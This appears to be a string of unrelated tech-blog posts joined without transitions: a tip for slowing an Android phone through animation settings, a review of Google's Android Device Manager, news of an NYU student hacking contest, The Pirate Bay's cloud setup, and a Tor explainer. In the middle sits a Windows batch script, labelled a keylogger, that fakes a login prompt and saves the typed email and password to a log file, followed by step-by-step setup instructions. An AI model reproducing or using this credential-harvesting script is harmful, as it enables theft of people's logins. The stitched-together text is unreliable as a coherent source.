Every one hates when their smartphone works very slow. In this tutorial we will teach you how to make an android smartphone performance very slow.
Follow the few simple steps given below to make an android smartphone performance slow.
Step 1: Go to settings and find “About phone” at very bottom of the list on Android phone.
Step 2: Inside About phone you can see “Build number” now keep on tapping “Build number” option until you get “Developer options”.
Step 3: Once you are inside developer options search for “Windows animation scale”, “Transition animation scale,” and “Animator duration scale.”
Step 4: Tap on each option and set the animation scale to 10x. Now you will feel your android smartphone performance very slow than before.
Note : By putting your Animation scale from 1x to 10x makes your android phone smart very slow, by clicking on Animation scale 1x it will bring your mobile to normal mode.
Lost you android phone ..? Feeling to sad .. :( Dont worry Now we came with another Application which sorts out your problem in simple way. Recently Google had come up with an Application called Android Device Manager.
What is Android Device Manager?
This App is developed by Google for their Android Devices, this App has a Security technique which allows users to locate their devices on Google Map. The app also allows its users to remotely erase all the data on the Smartphone or Tablet. Also it provides a functionality of remotely locking the Android Smartphone The Google Android Device Manager application is available for all the users to download on Google Play Store. The application comes in 1.0.2 version which can be easily installed on Android 2.3 or later versions.
Android Device Manager features:-
Android Device Manager features that includes locating an android tablet or smartphone on a map,
Resetting its locking code, and completely erasing it.
Missing device should connected to mobile network or to Wi-Fi for it to execute the commands.
Strong Points with Android Device Manager.
Free App available in Play Store.
App do’s:
Location tracking: Most common feature which comes with other tools too but acts as primary pros for this app. The Location tracking features requires no other additional setup is the feature on the cap for this app. Remote wipe: The best part of this tool is remotely cleaning the files on your phone which you think can be sensitive if used by the thief. Remote alarm: One can make use of this application for generating alarms remotely for their lost Smartphones or Tablets. Remote lock: Android Device Manager comes with fantastic feature of Remote Locking the Android Smartphone or Tablet. Easy: The User Interface of the application is very good and makes it easy to use.
App don’t do:
Spy Camera: The application is not able to give a spy camera feature which could have been an addition on if given in case of finding the lost Phone. Messaging: Android Device Manager App provides no facility of messaging that is common in most of the similar plot applications. Such a missing feature becomes a drawback for this app.
They are more Apps available in Play Store like Kaspersky Mobile Security, Avast Mobile Security and many more which provides more advance features than this like send messages to the lost device, and also receive images from the Android Smartphone or Tablet. I wish Google should put more advance features like this in it’s coming updates to Android Devices. It should also have pre-installed App like Find My Phone which is available for iPhone now.
Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.
@echo off
color a
title Login
cls
echo Please Enter Email Adresss And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
Step 1: Now paste the above code into Notepad and save it as a Logger.bat file.
Step 2: Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.)
Step 3: Drag that folder in to the C:\
Step 4: Test out the Logger.bat!
Step 5: Alright, now once you test it, you will go back into the Logs folder in the C:\ and a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]
The NYU Polytechnic School of Engineering has announced the largest hacking competition for students.This is especially for US students and they have chance to win cybersecurity-based scholarships and prizes.Announced perviously, the US college is now allowing students from high school to register for this largest hacking competition.
Last year over fifteen thousand students participated and many qualified the preliminary rounds in order to reach the finals in six separate competitions. This year is the 11th Cyber Security Awareness Week event.This year there are special prizes for students who qualify in preliminary hacking rounds, they get chance to travel to Brooklyn, NYC to compete for scholarships and prizes.
November 13-15 the finals will take place
Yahoo’s chief information security officer Alex Stamos will be in attendance, and will deliver the keynote address during the Finalist Reception on November 13. Stamos’s talk, “Shaping the Future: Spies, Cyber Crimes, and Your Career,” will explore historical and ethical debates within the field, as well as discuss his own experiences in protecting the data of Yahoo users.
Stamos commented:
“A career in information security has never held so much promise or peril. New members of the security community have the opportunity to build systems that bring trust and innovation into the lives of billions.”
Twenty institutions ready to sponser the security week inculding the US Department of Homeland Security, Yahoo, Facebook, the National Security Agency (NSA), Microsoft and the MIT Lincoln Laboratory.
The NYU School of Engineering was one of the first universities to offer cybersecurity programs for students in the United States. It also launched a master’s degree in the subject in 2009.
The Pirate Bay still remains the world’s largest torrent site which handles requests from millions of users every single day and is in the top 100 most visited websites on the Internet. Generally, The Pirate Bay is famous for potentially hosting copyright material on its website.
Despite years of harrassment from the law, it remains to violate copyright laws worldwide. Even both the founders of The Pirate Bay (TPB) file exchange service were arrested by the authorities and are in prison, but their notorious pirated content exchange continues to receive millions of unique visitors daily.
But how can they still be serving content whilst in prison?. Recently, The Pirate Bay team has revealed how cloud technology made its service’s virtual servers truly secure to avoid police raids and detection.
The Pirate Bay is running on “virtual machines” through a few commercial cloud hosting services, even without knowing that who they are dealing with. According to TorrentFreak report, at present The Pirate Bay has 21 virtual machines (VMs) that are hosted around the globe at different cloud providers.
The cloud technology eliminates the use of any crucial pieces of hardware, ultimately making the site more portable, and therefore made the torrent harder to take down. The Pirate Bay operates using 182 GB of RAM and 94 GPU cores, with total storage capacity of 620 GB, which actually are not used in full.
Out of 21 VMs, eight of the VMs are used to serve web pages, six are dedicated to handling searches, while two VMs currently runs the site’s database and the remaining five virtual machines are used for load balancing, statistics, the proxy site on port 80, torrent storage and for the controller.
Interestingly, the commercial cloud hosting providers have no idea that The Pirate Bay is using their services, because all traffic goes through the load balancer, which masks the activities of other virtual machines from the cloud providers. This clearly means that none of the IP-addresses of the cloud hosting providers are publicly linked to The Pirate Bay, therefore keeping them safe.
While, in case of closure of some of these cloud servers by the police, it is always possible to move VMs to another location in a relatively short duration of time. Just like when back in 2006 in Sweden, police raided The Pirate Bay’s hosting company, seizing everything from blank CDs to fax machines and servers, taking down the site. But, it took just three days to return in its normal state.
Tor is a free software program that you load onto your computer (like a browser) that hides your IP address every time you send or request data on the Internet. The process is layered with heavy-duty encryption, which means your data is layered with privacy protection.
Then there’s the route your data takes as it travels to its destination: Tor will bounce your Internet requests and data through a vast and extensive network of relays (servers) around the world. That data path is never the same, because Tor uses up to 5,000 Tor relays to send your data request. Think of it as a huge network of “hidden” servers that will keep your online identity (meaning your IP address) and your location invisible.
Tor has extreme value because it can work with your website browser, remote log-in applications and even with instant-messaging software. Tor is registered as a nonprofit company, so they run mainly on donations and reliance on the hope that people will become a relay to their network.
Uses of Tor
By using Tor, websites will no longer be able to track the physical location of your IP address or what you have been looking at online…and neither will any interested organizations that may want to monitor someone’s Internet activity—meaning law enforcement or government security agencies. Tor is like a proxy on steroids.
How it Works ?
Here is a video link of Tor :- How Tor Works – A ComputeCycle Deep Dive
Tor is slower than a regular Internet connection. However, the Tor developers have been doing a lot of hard work to make the Tor network faster. And it is faster today than ever before. One of the best things that can be done to speed up the Tor network is to create more relays. If you would like to contribute to making the Tor network faster, you can check out our Tor Challenge
Is Tor secure?
Security and anonymity go hand in hand on the Internet. As an online anonymizer, Tor was designed to be secure.
However, documents leaked by former National Security Agency (NSA) contractor Edward Snowden show that the NSA has tried to crack, infiltrate or weaken any encryption that the agency does not itself control.
In light of this news, nearly all independent encryption and online communication services have become suspect, including Tor.